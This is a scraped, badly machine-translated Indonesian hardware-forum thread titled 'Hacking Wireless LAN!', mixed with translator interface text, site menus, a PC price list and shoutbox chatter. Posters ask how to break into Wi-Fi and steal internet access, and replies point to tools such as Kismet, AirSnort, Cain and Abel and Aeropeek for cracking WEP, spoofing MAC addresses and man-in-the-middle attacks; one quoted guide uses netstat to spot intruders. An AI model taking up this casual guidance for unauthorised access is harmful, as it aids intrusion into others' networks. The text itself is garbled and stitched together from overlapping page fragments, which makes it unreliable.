tu be replaced kalo, can be many hours free access .... hehee <br> <br>Quote from: silverx on
March 17, 2007, 11:41:56 PM <br>These tools can be useful for browsing sangant increasingly
entering a network, Cain And Abel via google search .... aj certainly can, install and run, there you
can open companies that adapada networks, although different worgroupnya ........................... <br>I
was confused for existing antenna tutorinya above, connect to port ake PCnya hell? pake serial? ato
pake USB?? his antennae cuman doang ditutorial !!!!!!!!!!! 1 <br> <br>kalo ndak wrong, I had also
been mbaca similar articles. yes the cord tied to a WLAN antenna. gak tau deh, kalo gak pake
WLAN antenna can be anything ndak.jadi not pake usb, serial.kalo ndak a diameter of the can also
be adjusted to? <br> <br> Logged <br> <br> <br> <br>Panji <br>[Here To Help] <br>[Super
Admin] <br>Trade Count: (2) <br>[Hyper] <br> <br> <br>Posting Quality: 72 <br> Offline <br>
<br>Last Login: Today at 01:44:28 AM <br>Posts: 2515 <br>HY $ 9654.00 credits <br> <br>View
Inventory <br>Send Money to Panji <br> <br>Everything (better / worse) start from &#39;1 &#39;
<br> <br> <br> Re: Hacking Wireless LAN! <br>«Reply # 17 on: April 18, 2007, 05:40:04 PM»
<br> <br>-------------------------------------------------- ------------------------------ <br>HYEM will
launch DISTRO &quot;Hyper-Tux&#39;s&quot;, .. a special distribution tool2 fully-equipped for
water underground hacking and attack .. !! tunggu aja ... the HYEM Bonus DVD edition 7!! <br>
<br> Logged <br> <br>-------------------------------------------------- ------------------------------
<br>just trying to serve You ... <br>You are not allowed to view images. <br>Please register or
login <br>work as hard as u can .. and .. be as simple as u can, to be part of Others! <br> <br>
<br>Bryant <br>Guest <br>Trade Count: (0) <br> Re: Hacking Wireless LAN! <br>«Reply # 18
on: April 19, 2007, 03:19:49 PM» <br> <br>--------------------------------------------------
------------------------------ <br>Crack WEP can be read at the 2nd edition HyperMedia Magazine.
<br> <br> <br> Logged <br> <br> <br> <br>still_ndESo <br>NBP <br>[Community Member]
<br>Trade Count: (1) <br>[Hyper] <br> <br> <br>Posting Quality: 8 <br> Offline <br> <br>Last
Login: September 20, 2008, 02:39:26 PM <br>Posts: 1103 <br>HY $ 444.00 credits <br>
<br>View Inventory <br>Send Money to still_ndESo <br> <br> <br>No Body&#39;s Perfect <br>
<br> <br> Re: Hacking Wireless LAN! <br>«Reply # 19 on: April 20, 2007, 11:48:18 AM» <br>
<br>-------------------------------------------------- ------------------------------ <br>bro all, mo nanya nih,
kalo through Cain and abel dah dapet ip address, port, ama SSID, trus gimana biar bisa nge-purpose
remote computer? <br> <br> Logged <br> <br> <br> <br>aghya <br>[Community Member]
<br>Trade Count: (0) <br>[Enthusiast] <br> <br> <br>Posting Quality: 0 <br> Offline <br>
<br>Last Login: June 14, 2008, 09:49:04 PM <br>Posts: 109 <br>HY $ 99.00 credits <br>
<br>View Inventory <br>Send Money to aghya <br> <br> Re: Hacking Wireless LAN!
<br>«Reply # 20 on: June 23, 2007, 07:53:36 PM» <br>
<br>-------------------------------------------------- ------------------------------ <br>Quote from: Panji on
April 18, 2007, 05:40:04 PM <br>HYEM will launch DISTRO &quot;Hyper-Tux&#39;s&quot;, ..
a special distribution tool2 fully-equipped for water underground hacking and attack .. !! tunggu
aja ... the HYEM Bonus DVD edition 7!! <br> <br> <br>Oh well .. it .. I&#39;m waiting ... 7th
edition of the publication date when? <br> <br> Logged <br>
<br>-------------------------------------------------- ------------------------------ <br>Venice 3000 + @
2600 (daily) .. so far <br>DFI LP UT Nf4 Ultra-D (bios NF4LD406 04/06/2006) <br>Patriot 512
DDR 3200 <br>Forsa GeForce 6600 GT <br>Samsung SATA 80 <br>EXtreme 500 <br> <br>
<br>inou <br>Nubi all the time ... : D <br>[Community Member] <br>Trade Count: (2)
<br>[EXTREME] <br> <br> <br>Posting Quality: 1 <br> Offline <br> <br>Last Login: July 06,
2009, 03:57:59 PM <br>Posts: 563 <br>HY $ 82.00 credits <br> <br>View Inventory <br>Send
Money to inou <br> <br> <br>.: Lets Fill The World With Smile:. <br> <br> <br> Re: Hacking
Wireless LAN! <br>« Reply #21 on: November 20, 2007, 04:08:46 PM » <br>
<br>-------------------------------------------------- ------------------------------
<br>halow sadayana,ada yg punya AirPcap yg full ndak?bagi donk <br> <br> Logged <br>
<br>-------------------------------------------------- ------------------------------ <br>You are not allowed to
view links. <br>Register or Login <br>You are not allowed to view images. <br>Please register or
login <br> <br> <br> <br>OFFICIAL TEAM: <br>You are not allowed to view links.
<br>Register or Login <br>You are not allowed to view images. <br>Please register or loginYou
are not allowed to view images. <br>Please register or login <br> <br> <br>@5ph@lt
<br>[ Community Member ] <br>Trade Count: (0) <br>[ EXTREME ] <br> <br> <br>Posting
Quality: -11 <br> Offline <br> <br>Last Login:January 01, 2010, 12:07:33 PM <br>Posts: 724
<br>HY$287.00 credits <br> <br>View Inventory <br>Send Money to @5ph@lt <br>
<br>i&#39;m sick of........ <br> <br> <br> Re: Hacking Wireless LAN ! <br>« Reply #22 on:
November 21, 2007, 02:50:19 PM » <br> <br>--------------------------------------------------
------------------------------ <br>HYEM akan meluncurkan DISTRO &quot;Hyper-
TUX&#39;s&quot;,.. sebuah distro khusus yg dilengkapi tool2 lengkap untuk underground hacking
dan air attack.. !! tunggu aja... di Bonus HYEM DVD edisi 7 !! <br> <br> <br>koq ga ada ya?
<br> <br> Logged <br> <br>-------------------------------------------------- ------------------------------
<br>Sempron LE1150 I Abit NF-M2S I Elixir DDR2 667 1Gx2 I WDC 40GB I Seagate 120GB I
BenQ DW2000 I Simbokde 500W PPFC I Thermaltake iFlash 120mm I Compaq S510 15&quot;
<br>You are not allowed to view links. <br>Register or Login <br>You are not allowed to view
images. <br>Please register or login <br> <br>You are not allowed to view links. <br>Register or
Login <br> <br> <br> <br>1b3l_jubel <br>Trade Count: (0) <br>Interest.. <br> <br>
<br>Posting Quality: -1 <br> Offline <br> <br>Last Login:September 29, 2008, 03:49:00 PM
<br>Posts: 11 <br>HY$22.00 credits <br> <br>View Inventory <br>Send Money to 1b3l_jubel
<br> <br> <br> Re: Hacking Wireless LAN ! <br>« Reply #23 on: July 31, 2008, 08:31:10 PM »
<br> <br>-------------------------------------------------- ------------------------------ <br>tak coba dah.......
<br> <br> Logged <br> <br> <br> <br>@5ph@lt <br>[ Community Member ] <br>Trade
Count: (0) <br>[ EXTREME ] <br> <br> <br>Posting Quality: -11 <br> Offline <br> <br>Last
Login:January 01, 2010, 12:07:33 PM <br>Posts: 724 <br>HY$287.00 credits <br> <br>View
Inventory <br>Send Money to @5ph@lt <br> <br>i&#39;m sick of........ <br> <br> <br> Re:
Hacking Wireless LAN ! <br>« Reply #24 on: July 31, 2008, 08:43:51 PM » <br>
<br>-------------------------------------------------- ------------------------------ <br>hyem ga jadi keluarin
distro ya? <br> <br> Logged <br> <br> <br> <br> <br>Pages: [1] Go Up Print <br>
<br> <br>GoogleTagged: netstat socket windows abit merubah wireshark kampus source enkripsi
address <br>online hak org clien kita apa coding tool netview sofware <br> <br> <br>« previous
next » <br> <br> <br>Jump to: Please select a destination: ----------------------------- == T H E - C
O R E == [OFFICIAL BOARD] ----------------------------- =&gt; Official FAQ, Rules, &amp; Forum
Guide =&gt; Official Event =&gt; Official Folding/Grid Team [Hyper-GRID] =&gt; Official
Merchandise =&gt; REVIEW ===&gt; Mainboard Review ===&gt; Memory Review ===&gt;
Display Card Review ===&gt; CPU Review ===&gt; Pheriperal Review ===&gt; Software
Review ===&gt; Games Review =&gt; News &amp; Live Chat Discuss ! ===&gt; Hardware News
&amp; Articles ===&gt; Software News &amp; Articles ===&gt; Games News &amp; Articles
=&gt; Online Store &amp; Pricelist (JUST ENABLED ;) ) ===&gt; Intel System ===&gt; AMD
System ===&gt; | HYEM PURWOREJO | ===&gt; | HYEM PALEMBANG |
----------------------------- == HYPER X-3ME [ADVANCED &amp; SPECIALIST] == |only in
English| ----------------------------- =&gt; = WORLD RECORD ADICT = =&gt; =| X-3ME Suicide
Overclocking Championship |= ===&gt; SuperPi Team ===&gt; Sisoftsandra Team ===&gt; PC
Mark Team ===&gt; 3DMark Team ===&gt; Aquamark Team ===&gt; Mainboard Moding
----------------------------- == H A R D W A R E== ----------------------------- =&gt; Basic System
Troubleshooting, PC System &amp; Overclocking Guide =&gt; PC Modding =&gt; Processor
===&gt; AMD ===&gt; INTEL =&gt; Mainboard ===&gt; Abit =&gt; Memory ===&gt; ADATA
=&gt; Power Supply ===&gt; FSP =&gt; Display Card ===&gt; POV =&gt; Optical &amp;
Storages =&gt; Cooling =&gt; Sound &amp; Speaker Devices =&gt; Pheriperal &amp; Network
=&gt; Notebook &amp; PDA ----------------------------- == S O F T W A R E==
----------------------------- =&gt; Games ===&gt; Games F.A.Q. ===&gt; Game Cheat &amp;
Trainer ===&gt; Multiplayer Game =&gt; Operating System ===&gt; Windows ===&gt; Linux
===&gt; Macintosh =&gt; Programing =&gt; Security =&gt; Audio Freak =&gt; Webmastering
=&gt; 2D Designer and Animation [FOTO-VIDEO] =&gt; 3D Modelling and Animation =&gt;
Other Importance Software ===&gt; BIOS &amp; ROM ===&gt; Driver ===&gt; Overclocking
Tools ----------------------------- == ADD-ON BOARD == ----------------------------- =&gt; HOBBY
===&gt; Angkringan Ruwet x2 ===&gt; Angkringan Ngakak <br> <br> Permissions <br>
<br>You can&#39;t post new topics. <br>You can&#39;t post replies. <br>You can&#39;t post
attachments. <br>You can&#39;t modify your posts. <br>
<br>-------------------------------------------------- ------------------------------ <br>BBCode Enabled
<br>Smilies Enabled <br>[img] Enabled <br>HTML Enabled <br> <br> <br> <br> <br> <br>
<br>TinyPortal v.1.0.6 beta 2 © Bloc <br>Powered by SMF 1.1.10 | SMF © 2006-2009, Simple
Machines LLC <br>Theme by |Panji| <br>MySQL | PHP | XHTML | CSS <br>Page created in
0.868 seconds with 62 queries. (Pretty URLs adds 0.097s, 1q) <br>Loading...Loading... <br>
<br> <br> <br>

Bahasa yang tersedia untuk penerjemahan:

Afrikaans
Albania
Arab
Bahasa Indonesia
Belanda
Bulgar
Byelorusia
Cek
Dansk Esti
Farsi
Galisia
Hindi
Ibrani
Inggris
Irlandia
Islan
Italia Jepang
Jerman
Katalana
Korea
Kreol Haiti
Kroat
Latvi
Lituavi
Magyar Makedonia
Malta
Mandarin
Melayu
Norsk
Pilipino
Polski
Portugis
Prancis Rumania
Rusia
Serb
Sloven
Slowakia
Spanyol
Suomi
Swahili
Swensk Thai
Turki
Ukraina
Vietnam
Wales
Yiddi
Yunani

©2010 Google - Matikan terjemahan seketika - Kebijakan Privasi - BantuanSedang


diterjemahkan…

Web Gambar Maps Buku Terjemahan Blog Gmail selengkapnya ▼


Direktori Kalender Foto Documents Site Grup
Bantuan

Penerjemahan

Penelusuran Diterjemahkan
Translator Toolkit

Alat dan Sumber Daya

Menerjemahkan teks, laman web, dan


dokumen
Masukkan teks atau URL laman web, atau unggah dokumen.
Masukkan teks atau URL laman web, atau unggah dokumen.

Home Forum
Help Arcade
Calendar Shop LIVE
CHAT GoogleTagged
Login Register
Home
button Forum
Help Arcade
Calendar
Masukan Shop
Untuk LIVE
CHAT GoogleTagged
Pejabat-pejabat
Login Register
Forum HYPERMEDIA
button
You are not allowed
to view links.
Masukanor
Register Untuk
Login
Pejabat-pejabat
click here and post
Forum HYPERMEDIA
You are not allowed
to view links.
Register or Login
The Unordinary
click hereistilah
Masukkan and post
Terjemahkan dari: Bahasa Indonesia
pencarian Anda
Web hyem.org Terjemahkan
Terjemahkan ke: Inggris
Kirim formulir
The Unordinary
pencarian
Terjemahan
Masukkan Bahasa
istilahIndonesia ke Inggris Tunjukkan huruf latin
pencarian
You are not Anda
allowed
Web
to viewhyem.org
images.
Kirim
Pleaseformulir
register or
pencarian
login
You are not allowed
to view images.
Please
Welcome,register
Guest. or
login
Please login or
register.
March 06, 2010,
05:55:13 AM
Welcome,
1 HourGuest.
1 Day 1
Please
Week 1 login
Month or
Forever
register.
Login with username,
March 06,and
password 2010,
session
05:55:13
length AM
1 Hour 1
Pricelist Day 1!!
Update
Week 1 Month
PRICELIST Forever
UPDATE =>
Login
You arewith
notusername,
allowed
password and session
to view links.
length
Register or Login
Pricelist
(last updateUpdate
2009!!
PRICELIST
Okt 21) UPDATE =>
You are not allowed
to view links.
Register or Login
HYPER Xitro
(last update
Dragon-3D 2009AP1
Design
Okt 21)II X4 From X2
Phenom
Deneb, DFI LP DK
790FXB-M2RS,Palit HD
HYPER
4850, Xitro
OCZ Gold
Dragon-3D
Edition 2 Design
x 1GB, AP1
WDC
Phenom
500 GB II
16 X4
MB,From
ATX X2
+
Deneb,
EnhanceDFI
400WLPTrue
DK
Home Forum Help Arcade Calendar Shop LIVE CHAT button GoogleTagged Login Register

Input To officials Forum HYPERMEDIA


You are not allowed to view links.
Register or Login
click here and post

The Unordinary
Enter your search terms
Web hyem.org
Submit search form

You are not allowed to view images.


Please register or login

Welcome, Guest. Please login or register.


March 06, 2010, 05:55:13 PM
1 Hour 1 Day 1 Week 1 Month Forever
Login with username, password and session length
Pricelist Update!!
PriceList UPDATE => You are not allowed to view links.
Register or Login (last updated 2009 Oct 21)

Dragon Xitro Hyper-3D Design AP1


II Phenom X4 Deneb From X2, DFI LP DK 790FXB-M2RS, Palit HD 4850, OCZ Gold Edition 2 x
1GB, 500 GB WDC 16 MB, Enhance 400W ATX + True
PROMO: Rp. 4,978,765, --
Xitro Hyper-Fire Dragon AP1
Kuma Athlon X2 7750 +, abit AX78 AMD 770 / SB600 CrossFire Platform OTES Dragon, Saphire
HD4830/HD4770, 2x2G OCZ Gold Ed 8500 CL5, WDC 320 GB 16 MB, Foxconn Case + PSU
PROMO: Rp. 4,498,765, --
BEST SELLER ...!!!!

Hyper XITRO Designer AP2


Core2Quad Q8400, DFI LP GF9400-T2RS Junior Hybrid SLI, OCZ Fatality Edition 2X2G, WDC
500 GB 16 MB, Foxconn Case + PSU True (Graph DESIGNER PC)
PROMO: Rp. 4,454,545, --

Toxic Hyper-Dragon Xitro ACF


II Phenom X4 from 550BE, DFI LP BI-M35 CrossFireX 785G Dragon Platform, HD4830 Palit
256bit, DDR3 OCZ Fatality Edition 2X2G, 500 GB WDC, 400W Enhance True + (FREE
VENDETA II for Fist buyer everyday)
PROMO: Rp. 4,976,543, --

Hyper-Dragon Xitro Epix


Athlon II X2@3.5Ghz from sargas 140 + BIOSTAR TA785GE 128 CF, Palit HD4650 Super
512MB 128bit, DDR2 2X1G, 160GB WDC 16 MB, ATX 400W
PROMO: Rp. 2,525,252, --

| LCD 15.6 "+ Key + Mouse = Rp. 950rb | LCD 19" + Key + Laser Mouse = Rp.1.300rb | LCD 16
"+ Key + Mouse = Rp. 990rb |

Palit HD4870
Palit HD4870 Sonic Dual Edition DDR5, 512MB, 256bit OC 775/4000 Dual Speed (in some cases
is still 256bit graphics lbh dr 5770 128bit superior, let alone reply we see from the price /
performancenya)
PROMO: $ 150

Palit HD4850
Palit HD4830 DDR3, 512MB, 256bit, Core: 575 / Mem: 1800Mhz + HDMI

Youngest brother of the family RV770, Still be the Price / Performance King!
PROMO: $ 90

Palit HD3850 Super DDR3


RV 670, 256 MB DDR3, 256bit, 670MHZ, 1660MHZ, 319

With DDR3, High-end card is legendary high-end display card under $ 100, especially for high-
OC .. This babe is the Most Value King!
PROMO: $ 78, 512M: $ 65

ALL AVAILAVBE

Chat Now!

[more]
Last 20 Shouts:
-------------------------------------------------- ------------------------------
Panji
Today at 01:44:28 AM
Good for Hendy hyem .. lu ganyangka win bro ..
an35
Today at 12:50:18 AM
let kumbah-kumbah
toms_momo
Yesterday at 10:31:02 PM
quiet mas dab ...
Tito Haga
Yesterday at 07:51:15 PM
wakakakakaka
alexander_corvinus
Yesterday at 06:37:00 PM
wew do that 'an: p
B.U.G.S
Yesterday at 05:05:04 PM
@ Tito Haga
nge's iso-move nggo redirection tp ga, ga dadi metu MOVED .. MOVED .. MOMED marai ngunu
wae .. wakakaka ..
coolwin
Yesterday at 04:58:26 PM
BEST UPDATE CHECK today CF KILL !!!!! I'M IN RANK 2 wakakakakaka
Tito Haga
Yesterday at 02:51:11 PM
@ BUGS
hahahaha ... .. bar Tangi sori2 turu ngono kui ngemoved yes ... haha
donkey
Yesterday at 01:57:41 PM
wakakakaka ....
blackshield ™
Yesterday at 11:54:06 PM
cilukkkkkkkk
baaaaaaa ...
B.U.G.S
Yesterday at 10:39:35 PM
Jove, moved ming kok isine kabeh kie ..? nek nge-mending move topic lawas not dikei redirection
ga kang ..
Tito Haga
Yesterday at 08:26:27 PM
wakakakakka ... means the same boat
sadnux
Yesterday at 08:20:42 PM
its not about bersih2, tp itu lho yg in sign writing about college yg
parent often say kek gitu pas kl ane marahin T_T
Tito Haga
Yesterday at 08:13:04 PM
Hahahahaha ... yes ... maap2 technical error had bersih2 le ngemovednya wrong ... so kamr jugah::
sadnux
Yesterday at 08:09:47 PM
beautiful morning .. tp yg ketendang same directly pack signaturenya ditto
wakakakak
Tito Haga
Yesterday at 07:56:09 PM
morning kang
sadnux
Yesterday at 07:47:53 PM
met pagi all
Tito Haga
Yesterday at 06:34:29 PM
weh ... kang banner onlen
Panji
Yesterday at 06:13:51 PM
miss u all ...
Tito Haga
Yesterday at 05:30:56 PM
Ndalu gang

Show last 200

Polling
Lates Post
Sell fingerboard where y. .. by vheebhee [Today at 03:46:23 AM]
Tanya Mo. .. More Niy Can ... by Genah_wae [Today at 03:20:28 AM]
help me by botaxalim [Today at 02:04:50 AM]
EXPLANATION PLEASE wearing ... by botaxalim [Today at 01:54:06 AM]
Update March 5, 2010 Cross ... by botaxalim [Today at 01:36:16 AM]
[ASK] Building Network by botaxalim [Today at 01:28:59 AM]
Asus ROG Series 890FX Mot ... by Hazzan [Today at 12:24:06 AM]
guitar hero pc pake maen ... by SYXXness [Yesterday at 11:30:42 PM]
- Post Works 3D Made An ... by B.U.G.S [Yesterday at 10:05:46 PM]
(WTA) Cooling Procie Unru ... by kocek99 [Yesterday at 07:51:45 PM]
[WTA] 915GAV Intel 3x Tit ... by masYogo [Yesterday at 05:45:43 PM]
(Unlocking Test) Biostar ... by sandlewood [Yesterday at 01:37:37 PM]
Software audio player by Tito Haga [Yesterday at 07:20:09 PM]
Adjust DDR3 you ...!!! by masYogo [Yesterday at 05:18:00 PM]
[review] HaPe Modem "ray ... by frozr_man [Yesterday at 05:08:18 PM]
AMD VS INTEL <FIGHT! > By didit_catro '[Yesterday at 04:15:54 PM]
[Ask About] proci Warranty ... by sadnux [March 04, 2010, 11:03:15 PM]
[WTA] How to mbungkam Fan B. .. by SYXXness [March 04, 2010, 08:45:18 PM]
Mainboard 890gx / 890fx by frozr_man [March 04, 2010, 08:44:57 PM]
Creativity Adu Wallpaper by donkey [March 04, 2010, 07:16:40 PM]
Statistic
Members
Total Members: 10,884
Latest: Ricko
Stats
Total Posts: 102,876
Total Topics: 7713
Online Today: 56
Online Ever: 448
(April 04, 2008, 05:10:06 AM)
Users Online
Users: 15
Guests: 61
Total: 76
MARJ1NAL
Gytautas
paulpierce
myscreen
AKA2
citraxeena
best
brewox
arveds
Aero
B.U.G.S
Ricko
damonrulz
coolwin
aikendeva
Visitor MAP

Hot http://www3.clustrmaps.com/counter/maps.php?url=http://www.hyem.org NEWS


The Unordinary Community> Forum> == SOFTWARE ==> Security (Moderator: Light)> Hacking
Wireless LAN!
Pages: [1] Go Down «previous next»
Print

Author Topic: Hacking Wireless LAN! (Read 6005 times)

berang_berang
Trade Count: (0)
[POWERED]

Posting Quality: 0
Offline

Last Login: May 24, 2006, 10:28:54 PM


Posts: 57
HY $ 0.00 credits

View Inventory
Send Money to berang_berang
Topic starter

Hacking Wireless LAN!


«On: March 09, 2006, 01:07:46 PM»

-------------------------------------------------- ------------------------------
Kalo we want to hack the standard w.LAN tools2 what we wrote butuhin, and how gmana?

Gmana way in and gmana bobolnya way?


Trus kalo yg pake linux tools recommended what? kalo windows what?
Kalo mau nyolong gmana Internet connection?

Logged

Bryant
Guest
Trade Count: (0)
Re: Hacking Wireless LAN!
«Reply # 1 on: March 13, 2006, 01:02:12 PM»

-------------------------------------------------- ------------------------------
kismet for netstumbler & nyari AP or SSID yg buat airsnort active & ngecrack password ...
manual installation & tutorial googling aja. Jgn lupa kalo successful password share ...........

Logged

The Unordinary Community Re: Hacking Wireless LAN!


«Reply # 1: March 13, 2006, 01:02:12 PM»

-------------------------------------------------- ------------------------------

Logged

RooTrick
[Community Member]
Trade Count: (0)
[POWERED]

Posting Quality: 0
Offline

Last Login: September 10, 2009, 11:04:13 PM


Posts: 93
HY $ 36.00 credits

View Inventory
Send Money to RooTrick

Re: Hacking Wireless LAN!


«Reply # 2 on: March 19, 2006, 08:13:19 PM»

-------------------------------------------------- ------------------------------
download dmn tuh om?
trus kalo uda dapet makes source code applications na na gmn?
thx bgt ...
: mrgreen:

Logged

-------------------------------------------------- ------------------------------
Let the world revolves around me ...

densinyo
[Community Member]
Trade Count: (0)
[Enthusiast]

Posting Quality: 0
Offline

Last Login: February 28, 2010, 12:54:59 PM


Posts: 133
HY $ 353.00 credits

View Inventory
Send Money to densinyo

-=- environment ranging from self-=-

Re: Hacking Wireless LAN!


«Reply # 3 on: March 20, 2006, 08:15:01 PM»

-------------------------------------------------- ------------------------------
DL dmn tuh ... boleh dong requested the link ...

Logged

-------------------------------------------------- ------------------------------
T-Force 550! Athlon64 X2 4000 +! Adata 2gb! AcBel 400w! WDC 500GB! Pioneer DVD RW!
Lite-On DVD! A4Tech
-=- environment ranging from self-=-
081-5612-7812

You are not allowed to view links.


Register or Login
You are not allowed to view images.
Please register or login
The Unordinary Community Re: Hacking Wireless LAN!
«Reply # 3: March 20, 2006, 08:15:01 PM»

-------------------------------------------------- ------------------------------

Logged

Bryant
Guest
Trade Count: (0)
Re: Hacking Wireless LAN!
«Reply # 4 on: March 21, 2006, 03:09:47 PM»

-------------------------------------------------- ------------------------------
I have lg nih project, make antenna can make WiFinya YKPN shoot, there have any experience yg
ga tin bkin antenna?
Search tool material n ada yg tau ga?
This tutorial is reply pd sdikit interest:
You are not allowed to view links.
Register or Login

Logged

MAS
[OprekPC]
Trade Count: (0)
[POWERED]

Posting Quality: 0
Offline

Last Login: April 19, 2008, 06:18:17 PM


Posts: 57
HY $ 221.00 credits

View Inventory
Send Money to MAS

Re: Hacking Wireless LAN!


«Reply # 5 on: August 16, 2006, 02:28:36 AM»

-------------------------------------------------- ------------------------------
This follow aja deh ... You are not allowed to view links.
Register or Login sdh was too old Linux (Auditor following sdh n dah find her hard to replace
Backtrack) tp sure deh, klo you are able to implement, easy wuiiih banged.

one more thing .... wifi chipset election jg jd diliat pertimbangan.bisa here

You are not allowed to view links.


Register or Login

klo for windows, in addition netstumbler pake aja WDRIVER and AirSnort.jamin isa (klo cuman
make WEP) tp klo dah target MAC auth make it give up deh mas ... hehehe, before there isa yg

Logged

-------------------------------------------------- ------------------------------
You are not allowed to view links.
Register or Login
OprekPC ..:::.. Mods - Tweak - Overclock PC

You are not allowed to view links.


Register or Login
Warungplus

still_ndESo
NBP
[Community Member]
Trade Count: (1)
[Hyper]

Posting Quality: 8
Offline

Last Login: September 20, 2008, 02:39:26 PM


Posts: 1103
HY $ 444.00 credits

View Inventory
Send Money to still_ndESo

No Body's Perfect

Re: Hacking Wireless LAN!


«Reply # 6 on: December 13, 2006, 01:58:02 PM»

-------------------------------------------------- ------------------------------
gini bro, I'm on campus pake pake internet.tp facility via pc connected via LAN. trus time ta 'clay
found in the network is also connected via laptop2 wifi. I liatnya pake cmd, trus ta 'type "net view"
out tu laptop2nya. can ta 'not hacked from the pc I pake?
thanks ya ... (just curious, do not want to harm everybody)
Logged

psyCHo_L061c
Trade Count: (0)

Posting Quality: 0
Offline

Last Login: January 09, 2007, 09:24:31 PM


Posts: 2
HY $ 0.00 credits

View Inventory
Send Money to psyCHo_L061c

Re: Hacking Wireless LAN!


«Reply # 7 on: January 08, 2007, 04:52:37 PM»

-------------------------------------------------- ------------------------------
bisa aja om mah ..... hehehehe it easy, if u could've and taw gimana cara fingerprinting and foot
printingnya oms
trus taw a bug we're looking for security holes or it is what there do ,,,...... hehehehehehe so i am
just newbie

Logged

still_ndESo
NBP
[Community Member]
Trade Count: (1)
[Hyper]

Posting Quality: 8
Offline

Last Login: September 20, 2008, 02:39:26 PM


Posts: 1103
HY $ 444.00 credits

View Inventory
Send Money to still_ndESo

No Body's Perfect
Re: Hacking Wireless LAN!
«Reply # 8 on: January 26, 2007, 08:04:29 PM»

-------------------------------------------------- ------------------------------
Quote from: psyCHo_L061c on January 08, 2007, 04:52:37 PM
bisa aja om mah ..... hehehehe it easy, if u could've and taw gimana cara fingerprinting and foot
printingnya oms
trus taw a bug we're looking for security holes or it is what there do ,,,...... hehehehehehe so i am
just newbie

well, I mbok diajarin lha mas ... I still underneath a newbie


hehee

Logged

The Unordinary Community Re: Hacking Wireless LAN!


«Reply # 8: January 26, 2007, 08:04:29 PM»

-------------------------------------------------- ------------------------------

Order: hyem_toko

Logged

silverx
Trade Count: (0)
[Enthusiast]

Posting Quality: 1
Offline

Last Login: June 18, 2008, 02:50:14 PM


Posts: 121
HY $ 120.00 credits

View Inventory
Send Money to silverx

Enjoy Life It's ......

Re: Hacking Wireless LAN!


«Reply # 9 on: March 17, 2007, 11:41:56 AM»

-------------------------------------------------- ------------------------------
These tools can be useful for browsing sangant increasingly entering a network, Cain And Abel via
google search .... aj certainly can, install and run, there you can open companies that adapada
network, although worgroupnya different ...........................
I was confused for existing antenna tutorinya above, connect to port ake PCnya hell? pake serial?
ato pake USB?? his antennae cuman doang ditutorial !!!!!!!!!!! 1

Logged

-------------------------------------------------- ------------------------------
"Have Something In Need, Not according Desire "....

Arwan
Trade Count: (0)
Interest ..

Posting Quality: -1
Offline

Last Login: June 11, 2007, 11:16:42 PM


Posts: 11
HY $ 4.00 credits

View Inventory
Send Money to Arwan

never ending learning

Re: Hacking Wireless LAN!


«Reply # 10 on: April 07, 2007, 06:23:01 AM»

-------------------------------------------------- ------------------------------
Netstumbler, Kismet, and Aeroneet / aeropeek

its stuf ...


kismet make a reply to its plasticity mac address he kalo ga active we can use to change the MAC
address of our ... or you want to try "man in the middle"?

aeropeek can open either AP WEP WPA reply ... (not nyoba)
ASCII is usually encrypted so we look for similarities alone ... and may be divided into 4 atao like
ASCII codenya'll see ...
This can also be used for the man in the middle attack

There is no reply aeropeek MBO software I shared ... my software got damaged jeefo, and it is the
master .... kalo download more males (trial)

cmiiw

Logged
-------------------------------------------------- ------------------------------
i have my own journey

lelahana
Trade Count: (0)

Posting Quality: 0
Offline

Last Login: November 10, 2007, 04:43:39 PM


Posts: 4
HY $ 1.00 credits

View Inventory
Send Money to lelahana

Re: Hacking Wireless LAN!


«Reply # 11 on: April 09, 2007, 04:05:09 PM»

-------------------------------------------------- ------------------------------
sadisssssss ....
wah .... kckckckckckc linings semuanyajago ..
but the reply requested diajarin way, there are going ga?
jadi pengen nih ... curious buanget ga tau .... but how ...
ajarin dunks .. : '(:' (: '(:' (: '(:' (

Logged

arbangun
GamerZ, Coder & Carding
Trade Count: (0)
[Enthusiast]

Quality posts: 2
Offline

Last Login: October 19, 2009, 02:03:55 PM


Posts: 130
HY $ 40.00 credits

View Inventory
Send Money to arbangun

ARB'S Coorp
Re: Hacking Wireless LAN!
«Reply # 12 on: April 13, 2007, 12:52:50 PM»

-------------------------------------------------- ------------------------------
NUAMBAAAHHIIINN ... waaakaaakaa .....

coba pake APSniffer


trus ethereal (wireshark)
ama APsnort

tu pake tool, klo ga slh we can pass ama dpet username for log-on.

hmmm ya no more for a computer intruder detection can try jg nih pake this way

Quote
== MENDITEKSI NETWORK THROUGH intruder DOS ==

BEGIN

* INTRODUCTION: Maybe we do not realize if we play that there diwarnet


we are monitoring whether it adminya or prankster who want
steal information from us, so with that I will be a bit trying to see
or premises only mendetiksinya dos command!

It turned out there at Dos facility that may we all forgotten and rarely used
command is NETSTAT. Windows provides this command to support
network. Netstat can also be used to see the ip-ip that are connected
into our computer.
For that open the dos command you, you know how: d if ga tau nich:
- Start> Run> command.exe [for Win 95/98]
- Start> Run> cmd.exe [for a win 2000/XP / nt]
then the command prompt appear deh

C: \ WINNT> netstat?
Displays protocol statistics and current TCP / IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.


-e Displays Ethernet statistics. This may be combined with the-s option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the-s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the-p option may be used to specify
a subset of the default.
dedisplays interval selected statistics, Pausing interval seconds
between each display. Press CTRL + C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.

Now we use netstat to see the connections that are connected using-a

C: \ WINNT> netstat-a
Proto Local Address Foreign Address State
TCP me: http me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: epmap me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: https me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: microsoft-ds me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1025 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1027 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1028 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1071 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1146 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1163 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1253 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1261 me.ladomain.lintasarta.co.id: 0 LISTENING
